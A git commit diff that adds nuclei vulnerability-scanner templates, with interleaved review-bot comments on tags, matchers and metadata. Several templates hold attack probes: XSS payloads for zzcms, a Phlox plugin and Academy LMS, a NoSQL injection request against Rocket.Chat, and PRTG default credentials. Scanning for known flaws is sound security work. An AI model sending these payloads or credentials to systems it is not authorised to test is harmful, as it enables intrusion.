Merge branch 'projectdiscovery:master' into master

patch-1
Veshraj Ghimire 2022-10-03 16:41:30 +05:45 committed by GitHub
commit 0d5ed545fb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
26 changed files with 2520 additions and 2052 deletions


@ -1,26 +0,0 @@
cves/2016/CVE-2016-10368.yaml
cves/2017/CVE-2017-17736.yaml
cves/2019/CVE-2019-8086.yaml
cves/2020/CVE-2020-13820.yaml
cves/2020/CVE-2020-2733.yaml
cves/2021/CVE-2021-25104.yaml
cves/2021/CVE-2021-36873.yaml
cves/2022/CVE-2022-2546.yaml
cves/2022/CVE-2022-2551.yaml
cves/2022/CVE-2022-2633.yaml
cves/2022/CVE-2022-31814.yaml
default-logins/aem/aem-felix-console.yaml
default-logins/oracle/peoplesoft-default-login.yaml
exposed-panels/aircube-login.yaml
exposed-panels/oracle-business-intelligence.yaml
exposed-panels/webpagetest-panel.yaml
exposures/files/sendgrid-env.yaml
file/bash/bash.yaml
misconfiguration/aem/aem-bulkeditor.yaml
misconfiguration/aem/aem-custom-script.yaml
misconfiguration/aem/aem-dump-contentnode.yaml
technologies/moveit-transfer-detect.yaml
technologies/oracle/oracle-access-manager-detect.yaml
technologies/zend-server-test-page.yaml
vulnerabilities/other/webpagetest-ssrf.yaml
vulnerabilities/wordpress/age-gate-xss.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |
**297 directories, 4270 files**.
**299 directories, 4307 files**.
</td>
</tr>



@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |


@ -0,0 +1,43 @@
id: CVE-2020-20285
info:
name: zzcms - Reflected XSS
author: edoardottt
severity: medium
description: |
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-20285
cwe-id: CWE-79
metadata:
fofa-query: zzcms
verified: "true"
tags: cve,cve2020,zzcms,xss
requests:
- raw:
- |
GET /user/login.php HTTP/1.1
Host: {{Hostname}}
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
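Review bot: `verified: "true"` in the metadata block is a quoted string, while the other templates added in this commit (remedy-axis-login, somansa-dlp-detect, wampserver-homepage, atlassian-bamboo-build, gitea-public-signup, unauth-kubecost) write the boolean `verified: true`; one form should be used across the set, and the boolean matches the majority: `verified: true`. The same quoted form appears in the CVE-2021-22911, CVE-2022-1910 and CVE-2022-38553 hunks. The description also reads `There is a XSS in the user login page`; `There is an XSS in the user login page` is the correct article.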


@ -7,7 +7,7 @@ info:
description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35489
- https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload/
- https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/
- https://wordpress.org/plugins/contact-form-7/#developers
- https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/
classification:


@ -24,17 +24,19 @@ requests:
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'rel=\"admin\"'
- type: word
part: header
words:
- 'application/json'
part: header
- type: status
status:
- 200


@ -0,0 +1,49 @@
id: CVE-2021-22911
info:
name: RocketChat - NoSQL injection
author: tess,sullo
severity: critical
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
reference:
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
- https://hackerone.com/reports/1130721
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22911
cwe-id: CWE-89
metadata:
shodan-query: http.title:"Rocket.Chat"
verified: "true"
tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021
requests:
- raw:
- |-
POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^{{randstr}}\"}}] }"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[error-invalid-user]'
- '"success":true'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
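Review bot: The description lists the affected releases as `3.11, 3.12 and 3.1`, and the trailing `3.1` looks like a truncated version number rather than a real entry, since 3.1 predates the other two; the NVD page cited under `reference:` gives the affected releases, so the line should be corrected against it (presumably `3.11, 3.12 and 3.13`, to be confirmed). In the raw block the JSON body is printed directly under the `Content-Type` header; the rendered view drops blank lines, so confirm the file keeps the empty line that terminates the header section, otherwise the body is sent as a malformed header.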


@ -0,0 +1,43 @@
id: CVE-2022-1910
info:
name: Shortcodes and extra features for Phlox theme < 2.9.8 - Cross-Site-Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
- https://wordpress.org/plugins/auxin-elements/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1910
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1910
cwe-id: CWE-79
metadata:
verified: "true"
tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'widget-title"><script>alert(document.domain)</script></h3>'
- 'aux-widget'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
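Review bot: The tag list carries `cve2017` for a 2022 identifier, so this template is excluded from `-tags cve2022` runs and wrongly included in `cve2017` ones; the line should read `tags: wordpress,xss,auxin-elements,wpscan,cve,cve2022,wp-plugin,wp`. The `cve-id` and `id` fields already say CVE-2022-1910, so only the tag is inconsistent.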


@ -18,7 +18,7 @@ info:
cwe-id: CWE-77
metadata:
shodan-query: http.component:"BitBucket"
tags: cve,cve2022,bitbucket,atlassian
tags: cve,cve2022,bitbucket,atlassian,kev
variables:
data: '{{rand_base(5)}}'


@ -0,0 +1,45 @@
id: CVE-2022-38553
info:
name: Academy Learning Management System < v5.9.1 - Reflected XSS
author: edoardottt
severity: medium
description: |
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
reference:
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
- https://github.com/4websecurity/CVE-2022-38553
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38553
cwe-id: CWE-79
metadata:
google-query: intext:"Study any topic, anytime"
verified: "true"
tags: cve,cve2022,academylms,xss
requests:
- method: GET
path:
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- 'Study any topic'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200


@ -0,0 +1,43 @@
id: prtg-default-login
info:
name: PRTG Network Monitor Default Login
author: johnk3r
severity: high
description: PRTG default admin credentials were discovered.
reference:
- https://www.paessler.com/manuals/prtg/login
classification:
cwe-id: CWE-798
metadata:
shodan-query: http.favicon.hash:-655683626
tags: prtg,default-login
requests:
- raw:
- |
POST /public/checklogin.htm HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginurl=&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- prtgadmin
password:
- prtgadmin
matchers-condition: and
matchers:
- type: word
part: header
words:
- "OCTOPUS"
- "/home"
condition: and
- type: status
status:
- 302


@ -0,0 +1,30 @@
id: remedy-axis-login
info:
name: Remedy Axis Login
author: tess
severity: info
metadata:
shodan-query: http.html:"BMC Remedy"
verified: true
tags: panel,remedy,bmc
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/arsys/shared/login.jsp'
- '{{BaseURL}}/rsso/admin/'
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "BMC&nbsp;Remedy&nbsp;Mid&nbsp;Tier&nbsp;"
- "Remedy Login Page"
- "BMC Remedy"
- "BMC Smart Reporting"
condition: or
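Review bot: This panel template has only a body word matcher with `condition: or`, and one of the words is the short product name `"BMC Remedy"`, so any response naming the product, including an error or maintenance page, is reported as a login panel; the other panel templates in this commit (wampserver-homepage, somansa-dlp-detect) pair the body match with a status check. Adding `matchers-condition: and` above `matchers:` and a second matcher of `- type: status` / `status:` / `- 200` would bring it in line and cut the false positives. The first path is the bare `'{{BaseURL}}'`, which with `stop-at-first-match: true` means a root page mentioning BMC Remedy stops the probe before the login URLs are tried; that may be intended, but it is worth stating in a comment.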


@ -0,0 +1,33 @@
id: somansa-dlp-detect
info:
name: Somansa DLP Center Detection
author: gy741,ritikchaddha
severity: info
reference:
- https://www.somansa.com/solution/integrated_solution/dlp/
metadata:
verified: true
shodan-query: http.html:"DLP system"
tags: panel,somansa,dlp
requests:
- method: GET
path:
- "{{BaseURL}}/DLPCenter/loginform.sms"
- "{{BaseURL}}/DLPCenter/images/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "/DLPCenter/js/"
- "SOMANSA"
condition: and
case-insensitive: true
- type: dsl
dsl:
- "status_code==200 && (\"-1217239281\" == mmh3(base64_py(body)))"


@ -0,0 +1,26 @@
id: wampserver-homepage
info:
name: WAMPSERVER Homepage
author: DhiyaneshDk
severity: info
metadata:
verified: true
shodan-query: title:"WAMPSERVER Homepage"
tags: panel,wampserver
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>WAMPSERVER Homepage</title>"
- type: status
status:
- 200


@ -1,20 +0,0 @@
id: xenforo-login
info:
name: XenForo Login/Register
author: dhiyaneshDk
severity: info
metadata:
shodan-query: http.title:"XenForo"
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/index.php'
matchers:
- type: word
words:
- '<title>XenForo</title>'
condition: and


@ -1,13 +1,14 @@
id: hp-color-laserjet-detect
info:
name: HP Color LaserJet detection
name: HP Color LaserJet Detection
author: idealphase,gy741
severity: info
reference:
- http://www.hp.com/
- https://www.hp.com/us-en/shop/cv/printers
metadata:
verified: true
shodan-query: http.title:"HP Color LaserJet"
google-query: intitle:"HP Color LaserJet"
tags: iot,hp
@ -16,15 +17,21 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/hp/device/this.LCDispatcher"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>HP Color LaserJet"
- "HP Color LaserJet"
- '<td class="mastheadTitle"><h1>HP Color LaserJet'
- '<strong class="product">HP Color LaserJet'
- '<a href="info_deviceStatus.html?'
condition: or
- type: status
status:
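Review bot: The new word `'<a href="info_deviceStatus.html?'` is, as far as I know, a page name shared by the embedded web server of HP printers generally rather than something specific to the Color LaserJet line, and under `condition: or` it alone satisfies the matcher, so other HP printer models would be reported by a template whose id and name promise Color LaserJet detection; confirm against a non-Color device and, if so, drop that entry or keep only the title and masthead strings. If `"HP Color LaserJet"` is retained on the new side, the two more specific strings beneath it are redundant under `or` since they contain it. The status matcher's values follow the end of the hunk and are not visible here.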


@ -16,7 +16,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/content.infinity.json"
- "{{BaseURL}}{{path}}"
- "{{BaseURL}}/{{path}}"
iterate-all: true
extractors:
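Review bot: The new `"{{BaseURL}}/{{path}}"` inserts a slash unconditionally, so any `path` value that already starts with `/` now yields a `//` in the request line; the extractor that populates `path` sits outside the hunk, so whether its values carry a leading slash cannot be checked from here. If both forms can occur, a comment above the line stating the expected shape of `path` (`# path values are extracted without a leading slash`) would document the assumption the fix relies on.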


@ -0,0 +1,33 @@
id: atlassian-bamboo-build
info:
name: Atlassian Bamboo Build Dashboard
author: DhiyaneshDK
severity: unknown
metadata:
verified: true
shodan-query: title:"Build Dashboard - Atlassian Bamboo"
tags: misconfig,atlassian,bamboo
requests:
- method: GET
path:
- "{{BaseURL}}/allPlans.action"
matchers-condition: and
matchers:
- type: word
words:
- "<th>Project</th>"
- "<th>Plan</th>"
- "<th>Build</th>"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
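Review bot: `severity: unknown` reads like a placeholder; every other template in this commit carries a concrete level, and an unauthenticated build dashboard is at least an information exposure, so `severity: info` (or `low`, per the project's convention for misconfig templates) should be set before merge. The word matcher has no `part:` and relies on the body default, whereas the second matcher states `part: header`; adding `part: body` to the first keeps the two matchers parallel.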


@ -0,0 +1,38 @@
id: gitea-public-signup
info:
name: Gitea Public Registration Enabled
author: edoardottt
severity: high
description: |
A misconfiguration in Gitea allows arbitrary users to sign up and read code hosted on the service.
reference:
- https://www.youtube.com/watch?v=oHhofSj9lEM&t=157s
- https://gitea.io/en-us/
metadata:
verified: true
shodan-query: html:"Powered by Gitea"
tags: misconfig,gitea
requests:
- method: GET
path:
- '{{BaseURL}}/user/sign_up'
matchers-condition: and
matchers:
- type: word
words:
- 'Powered by Gitea Version'
- 'Register -'
condition: and
- type: word
part: body
words:
- "Registration is disabled. Please contact your site administrator."
negative: true
- type: status
status:
- 200
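Review bot: The description claims that open registration lets arbitrary users `read code hosted on the service`, but the template only confirms that `/user/sign_up` is served without the registration-disabled notice; whether any repository is readable by a fresh account is not checked, and public repositories are readable without an account anyway, so the text overstates what a match establishes and `severity: high` rests on that claim. Rewording the description to what is verified (`Gitea allows public self-registration`) and revisiting the severity would make the finding accurate; the negative matcher's sentence is a literal UI string, so keep it byte-for-byte. The first word matcher omits `part: body` while the second states it; align them.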


@ -0,0 +1,30 @@
id: unauth-kubecost
info:
name: KubeCost - Unauthenticated Dashboard Exposure
author: pussycat0x
severity: medium
reference: https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478
metadata:
verified: true
shodan-query: title:kubecost
tags: misconfig,exposure,unauth,kubecost
requests:
- method: GET
path:
- '{{BaseURL}}/overview.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Cluster Overview | Kubecost</title>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
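Review bot: `reference:` is a bare scalar here, whereas every other template in this commit writes it as a list, and the single value is a Facebook photo URL, which is neither a stable nor a verifiable source for the claim that the dashboard is exposed without authentication. It should become a list entry pointing at the Kubecost documentation, e.g. `reference:` / `- <kubecost-docs-url-to-be-supplied>`. The word matcher has no `part: body`, unlike the header matcher beneath it; state the part for consistency.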


@ -15074,4 +15074,9 @@ requests:
words:
- Powered by <a href='http://zzzcms.com'>ZZZcms</a>
- type: word
name: bitwarden
words:
- <title page-title>Bitwarden Web Vault</title>
# Enhanced by cs on 2022/02/08


@ -13,6 +13,7 @@ requests:
path:
- '{{BaseURL}}/oamfed/idp/soap'
matchers-condition: and
matchers:
- type: word
part: body


@ -0,0 +1,27 @@
id: xenforo-detect
info:
name: XenForo Forum Detection
author: dhiyaneshDk,daffainfo
severity: info
metadata:
shodan-query: http.title:"XenForo"
tags: tech,xenforo
requests:
- method: GET
path:
- '{{BaseURL}}/index.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<html id="XenForo"'
- '<html id="XF"'
condition: or
- type: status
status:
- 200


@ -0,0 +1,34 @@
id: unauthenticated-duplicator-disclosure
info:
name: WordPress Duplicator Plugin - Information disclosure
author: tess
severity: medium
description: |
Unauthenticated Information disclosure of Duplicator WordPress plugin sensitive files.
metadata:
verified: true
tags: wordpress,wp,wp-plugin,misconfig,disclosure,unauth,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
- "{{BaseURL}}/wp-content/backups-dup-lite"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Index of /wp-content/backups-dup-lite/'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
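Review bot: The second path `"{{BaseURL}}/wp-content/backups-dup-lite"` has no trailing slash, and servers that redirect directory requests to the slash-terminated form will answer 301, which the `status: 200` matcher rejects since the template sets no `redirects:`; on such hosts the second probe can never match. Either add the trailing slash, or set `redirects: true` with `max-redirects: 1` as hp-color-laserjet-detect does in this commit. The body word `'Index of /wp-content/backups-dup-lite/'` is a prefix of the `tmp/` listing's title as well, so it serves both paths.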